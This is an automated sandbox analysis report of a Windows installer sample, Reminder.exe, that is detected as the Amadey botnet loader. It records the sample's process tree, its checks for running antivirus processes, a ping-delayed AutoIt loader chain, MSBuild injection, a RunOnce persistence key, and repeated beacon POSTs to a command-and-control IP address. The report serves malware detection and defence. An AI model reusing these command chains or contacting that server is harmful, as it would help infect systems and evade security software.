Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Reminder.exe

Overview

General Information

Sample name:Reminder.exe
Analysis ID:1540342
MD5:d743bb6502147d38addb430590bc7a98
SHA1:16cd70dd31fc54c0e42695441dbf3eab5de2e2bd
SHA256:ebe565a1a2b13e3cbcf7bcc58ea8bee81bd1ed2fed0e5977dc9e108ee8cbae95
Infos:

Detection

Amadey
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Silenttrinity Stager Msbuild Activity
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files

Classification

  • System is w10x64_ra
  • Reminder.exe (PID: 6676 cmdline: "C:\Users\user\Desktop\Reminder.exe" MD5: D743BB6502147D38ADDB430590BC7A98)
    • Reminder.tmp (PID: 6664 cmdline: "C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmp" /SL5="$40392,1755695,835584,C:\Users\user\Desktop\Reminder.exe" MD5: 4BFB5A37DC6ACBC273CEB792408BFEC9)
      • Reminder.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: D743BB6502147D38ADDB430590BC7A98)
        • Reminder.tmp (PID: 4176 cmdline: "C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmp" /SL5="$6037A,1755695,835584,C:\Users\user\Desktop\Reminder.exe" /VERYSILENT MD5: 4BFB5A37DC6ACBC273CEB792408BFEC9)
          • cmd.exe (PID: 6364 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6468 cmdline: tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 6488 cmdline: find /I "wrsa.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6592 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 6328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 2828 cmdline: tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 1732 cmdline: find /I "opssvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 5000 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 2864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6884 cmdline: tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 3868 cmdline: find /I "avastui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 984 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6760 cmdline: tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 6844 cmdline: find /I "avgui.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6204 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 5612 cmdline: tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 3532 cmdline: find /I "nswscsvc.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • cmd.exe (PID: 6448 cmdline: "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • tasklist.exe (PID: 6464 cmdline: tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
            • find.exe (PID: 2728 cmdline: find /I "sophoshealth.exe" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
          • Updater.exe (PID: 6332 cmdline: "C:\Users\user\AppData\Local\coigned\\Updater.exe" "C:\Users\user\AppData\Local\coigned\\friendliwise.csv" MD5: 3F58A517F1F4796225137E7659AD2ADB)
            • cmd.exe (PID: 5700 cmdline: "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\ZPrVgH71.a3x && del C:\ProgramData\\ZPrVgH71.a3x MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • PING.EXE (PID: 5564 cmdline: ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12)
              • Updater.exe (PID: 6728 cmdline: updater.exe C:\ProgramData\\ZPrVgH71.a3x MD5: 3F58A517F1F4796225137E7659AD2ADB)
                • MSBuild.exe (PID: 7096 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
SourceRuleDescriptionAuthorStrings
00000029.00000002.2093368871.0000000003E62000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    0000002A.00000002.2510265571.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

      System Summary

      barindex
      Source: Threat createdAuthor: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, SourceProcessId: 7096, StartAddress: 420980, TargetImage: C:\Windows\System32\conhost.exe, TargetProcessId: 7096
      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 152.89.198.124, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7096, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49716
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\begcffd\AutoIt3.exe" C:\begcffd\fdeahdg.a3x, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\coigned\Updater.exe, ProcessId: 6728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\fdeahdg
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-23T17:05:17.893815+020028561471A Network Trojan was detected192.168.2.1649724152.89.198.12480TCP
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-10-23T17:04:59.570187+020028561481A Network Trojan was detected192.168.2.1649717152.89.198.12480TCP
      2024-10-23T17:05:04.499268+020028561481A Network Trojan was detected192.168.2.1649719152.89.198.12480TCP
      2024-10-23T17:05:09.470466+020028561481A Network Trojan was detected192.168.2.1649721152.89.198.12480TCP
      2024-10-23T17:05:14.387108+020028561481A Network Trojan was detected192.168.2.1649723152.89.198.12480TCP
      2024-10-23T17:05:20.333260+020028561481A Network Trojan was detected192.168.2.1649725152.89.198.12480TCP
      2024-10-23T17:05:25.275673+020028561481A Network Trojan was detected192.168.2.1649727152.89.198.12480TCP
      2024-10-23T17:05:30.591193+020028561481A Network Trojan was detected192.168.2.1649729152.89.198.12480TCP
      2024-10-23T17:05:35.558630+020028561481A Network Trojan was detected192.168.2.1649731152.89.198.12480TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Reminder.exeReversingLabs: Detection: 54%
      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: Reminder.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

      Networking

      barindex
      Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.16:49724 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49719 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49725 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49729 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49721 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49723 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49717 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49727 -> 152.89.198.124:80
      Source: Network trafficSuricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.16:49731 -> 152.89.198.124:80
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: global trafficHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 152Cache-Control: no-cacheData Raw: 72 3d 34 34 44 35 39 46 35 38 41 31 37 44 46 32 37 30 39 41 32 30 43 37 37 33 37 44 42 36 39 45 35 32 34 30 42 45 37 35 44 36 35 45 32 39 43 34 30 33 34 34 31 41 31 44 37 45 38 41 44 42 46 34 39 32 31 38 31 35 44 31 44 35 32 32 38 33 44 38 32 39 43 43 43 37 31 37 41 39 44 30 31 33 38 36 43 34 45 42 32 38 38 32 41 43 31 43 35 46 45 37 45 36 46 38 36 30 33 35 32 30 43 30 41 42 42 31 43 38 35 43 39 45 34 41 32 45 31 36 33 38 41 36 45 42 32 45 43 44 33 34 Data Ascii: r=44D59F58A17DF2709A20C7737DB69E5240BE75D65E29C403441A1D7E8ADBF4921815D1D52283D829CCC717A9D01386C4EB2882AC1C5FE7E6F8603520C0ABB1C85C9E4A2E1638A6EB2ECD34
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownTCP traffic detected without corresponding DNS query: 152.89.198.124
      Source: unknownHTTP traffic detected: POST /8bdDsv3dk2FF/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 152.89.198.124Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
      Source: Reminder.exeStatic PE information: Number of sections : 11 > 10
      Source: Reminder.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: classification engineClassification label: mal84.troj.spyw.evad.winEXE@60/7@0/11
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpFile created: C:\Users\user\AppData\Local\coigned
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2900:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1428:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1608:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: Local\SM0:2864:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6328:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7096:120:WilError_03
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\cb36de7f397799e419deb9caf3a96a89
      Source: C:\Users\user\Desktop\Reminder.exeFile created: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\Desktop\Reminder.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\Temp\is-KHK92.tmp\Reminder.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\user\AppData\Local\coigned\Updater.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
      Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
      Source: C:\Users\user\AppData\Local\Temp\is-H0PE8.tmp\Reminder.tmpFile read: C:\Users\user\Desktop\desktop.ini
